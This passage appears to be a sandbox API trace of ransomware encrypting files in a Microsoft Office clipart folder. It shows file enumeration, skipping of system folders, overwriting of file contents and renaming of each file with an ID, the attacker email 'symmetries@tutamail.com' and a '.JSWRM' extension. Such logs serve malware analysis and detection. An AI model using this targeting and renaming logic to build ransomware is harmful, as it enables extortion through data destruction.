lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8c0, lpOverlapped=0x0) returned 1 [0093.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0093.260] CloseHandle (hObject=0x314) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0093.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0093.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.261] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02522_.WMF", cAlternateFileName="")) returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2=".") returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="..") returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="...") returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="windows") returned -1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="recovery") returned -1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="perflogs") returned -1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="documents and settings") returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="system volume information") returned -1 [0093.261] lstrcmpiW (lpString1="PE02522_.WMF", lpString2="msocache") returned 1 [0093.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02522_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02522_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02522_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02522_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02522_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02522_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.263] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14840) returned 1 [0093.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x39f0) returned 0x24d210 [0093.263] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x39f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x39f0, lpOverlapped=0x0) returned 1 [0093.280] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.280] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x39f0, lpOverlapped=0x0) returned 1 [0093.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.280] CloseHandle (hObject=0x314) returned 1 [0093.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0093.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0093.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0093.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0093.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.282] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d2a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02950_.WMF", cAlternateFileName="")) returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2=".") returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="..") returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="...") returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="windows") returned -1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="recovery") returned -1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="perflogs") returned -1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="documents and settings") returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="system volume information") returned -1 [0093.282] lstrcmpiW (lpString1="PE02950_.WMF", lpString2="msocache") returned 1 [0093.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02950_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02950_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02950_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02950_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02950_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02950_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.284] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7466) returned 1 [0093.284] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d20) returned 0x205850 [0093.285] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d20, lpOverlapped=0x0) returned 1 [0093.287] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.287] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d20, lpOverlapped=0x0) returned 1 [0093.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.288] CloseHandle (hObject=0x314) returned 1 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0093.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0093.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.288] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0093.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.290] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02957_.WMF", cAlternateFileName="")) returned 1 [0093.290] lstrcmpiW (lpString1="PE02957_.WMF", lpString2=".") returned 1 [0093.290] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="..") returned 1 [0093.290] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="...") returned 1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="windows") returned -1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="recovery") returned -1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="perflogs") returned -1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="documents and settings") returned 1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="system volume information") returned -1 [0093.291] lstrcmpiW (lpString1="PE02957_.WMF", lpString2="msocache") returned 1 [0093.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02957_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02957_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02957_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0093.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02957_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02957_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02957_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0093.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.292] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3184) returned 1 [0093.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc70) returned 0x23fc98 [0093.292] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc70, lpOverlapped=0x0) returned 1 [0093.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.391] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc70, lpOverlapped=0x0) returned 1 [0093.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0093.392] CloseHandle (hObject=0x314) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0093.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.392] HeapFree 